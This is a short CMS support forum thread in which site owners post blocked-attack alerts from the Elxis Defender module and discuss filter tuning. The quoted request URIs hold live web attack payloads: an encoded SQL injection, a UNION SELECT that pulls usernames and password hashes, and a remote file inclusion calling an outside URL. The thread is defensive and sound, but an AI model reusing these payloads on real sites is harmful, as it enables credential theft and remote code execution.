Elxis CMS Forum
Support => General => Topic started by: CREATIVE Options on August 23, 2008, 01:34:08
-
Here is a part of the try to attack into one of my websites.
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 97.1**.**.**
Requested URI: /?;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
DATE: 22-08-2008 12:49:49
Attack was logged
Once again I am saying, ENABLE the Elxis Defender with ALL the filters.
-
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.47.*.* (blocked)
Requested URI: /google.xml/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password,0x3a,0x4861636B20427920436176616C657261)/**/from/**/mos_users/*\'
DATE: 16-03-2009 17:46:37
Attack was logged
-
Don't worry this is an attack for Mambo component, so it can't have any effect on Elxis.
-
I think that should not worry at all about attacks that are logged...
the opposite is dangerous!
-
You can search apache log files to see un-logged attacks and set afterwards the proper filters on defender.
-
3rd time today
Requested URI: /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.xxx-xxxxxx.org/scan/copyright.txt?
-
is it correct to use =http as a filter ?
i used it once and half of my members (authors) get banned
does elxis uses =http command somewhere ?